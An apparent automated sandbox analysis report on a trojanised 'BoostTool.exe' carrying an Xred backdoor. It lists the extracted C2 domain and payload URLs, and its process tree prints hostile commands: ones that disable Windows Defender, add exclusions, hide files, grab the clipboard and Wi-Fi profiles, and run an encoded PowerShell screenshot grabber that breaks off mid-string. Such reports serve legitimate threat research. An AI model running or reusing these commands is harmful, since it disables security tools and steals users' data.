Analysis

  • max time kernel
    152s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-12-2024 18:52

General

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    [email protected]

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Signatures

  • Xred

    Xred is backdoor written in Delphi.

  • Xred family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Using powershell.exe command.

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 6 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 9 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 3 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 6 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Gathers system information 1 TTPs 3 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 4 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/Zm17du
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:644
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xe0,0xe4,0xd8,0xdc,0x108,0x7ff83b1346f8,0x7ff83b134708,0x7ff83b134718
      2⤵
        PID:1572
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,1595832306762238141,5051568613885907940,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
        2⤵
          PID:3964
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,1595832306762238141,5051568613885907940,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4236
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,1595832306762238141,5051568613885907940,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
          2⤵
            PID:2476
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1595832306762238141,5051568613885907940,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
            2⤵
              PID:776
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1595832306762238141,5051568613885907940,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
              2⤵
                PID:3556
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1595832306762238141,5051568613885907940,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
                2⤵
                  PID:2700
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,1595832306762238141,5051568613885907940,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:8
                  2⤵
                    PID:1708
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,1595832306762238141,5051568613885907940,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5008
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1595832306762238141,5051568613885907940,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=180 /prefetch:1
                    2⤵
                      PID:1984
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,1595832306762238141,5051568613885907940,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5472 /prefetch:8
                      2⤵
                        PID:5056
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1595832306762238141,5051568613885907940,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
                        2⤵
                          PID:868
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,1595832306762238141,5051568613885907940,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5916 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1440
                      • C:\Windows\System32\CompPkgSrv.exe
                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                        1⤵
                          PID:2352
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:436
                          • C:\Windows\System32\rundll32.exe
                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                            1⤵
                              PID:1420
                            • C:\Users\Admin\Downloads\OneStopShop\BoostTool.exe
                              "C:\Users\Admin\Downloads\OneStopShop\BoostTool.exe"
                              1⤵
                                PID:4212
                                • C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
                                  "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2520
                                  • C:\Windows\system32\cmd.exe
                                    cmd /c cls
                                    3⤵
                                      PID:316
                                  • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                                    2⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • System Location Discovery: System Language Discovery
                                    • Modifies registry class
                                    PID:4820
                                    • C:\Users\Admin\Downloads\OneStopShop\._cache_RuntimeBroker.exe
                                      "C:\Users\Admin\Downloads\OneStopShop\._cache_RuntimeBroker.exe"
                                      3⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      PID:1648
                                      • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
                                        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                                        4⤵
                                        • Executes dropped EXE
                                        PID:3196
                                        • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
                                          "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:3124
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'"
                                            6⤵
                                              PID:3956
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'
                                                7⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2492
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                              6⤵
                                                PID:2828
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4236
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""
                                                6⤵
                                                • Hide Artifacts: Hidden Files and Directories
                                                PID:748
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                                                  7⤵
                                                  • Views/modifies file attributes
                                                  PID:732
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‍ .scr'"
                                                6⤵
                                                  PID:2420
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‍ .scr'
                                                    7⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4764
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  6⤵
                                                    PID:1420
                                                    • C:\Windows\system32\tasklist.exe
                                                      tasklist /FO LIST
                                                      7⤵
                                                      • Enumerates processes with tasklist
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5460
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    6⤵
                                                      PID:2068
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist /FO LIST
                                                        7⤵
                                                        • Enumerates processes with tasklist
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5544
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                      6⤵
                                                        PID:1080
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                          7⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5876
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                        6⤵
                                                        • Clipboard Data
                                                        PID:2292
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-Clipboard
                                                          7⤵
                                                          • Clipboard Data
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5712
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                        6⤵
                                                          PID:4992
                                                          • C:\Windows\system32\tasklist.exe
                                                            tasklist /FO LIST
                                                            7⤵
                                                            • Enumerates processes with tasklist
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5840
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          6⤵
                                                            PID:3908
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              7⤵
                                                                PID:5856
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                              6⤵
                                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                                              PID:3812
                                                              • C:\Windows\system32\netsh.exe
                                                                netsh wlan show profile
                                                                7⤵
                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                • System Network Configuration Discovery: Wi-Fi Discovery
                                                                PID:5824
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "systeminfo"
                                                              6⤵
                                                                PID:3468
                                                                • C:\Windows\system32\systeminfo.exe
                                                                  systeminfo
                                                                  7⤵
                                                                  • Gathers system information
                                                                  PID:6048
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                6⤵
                                                                  PID:5272
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAH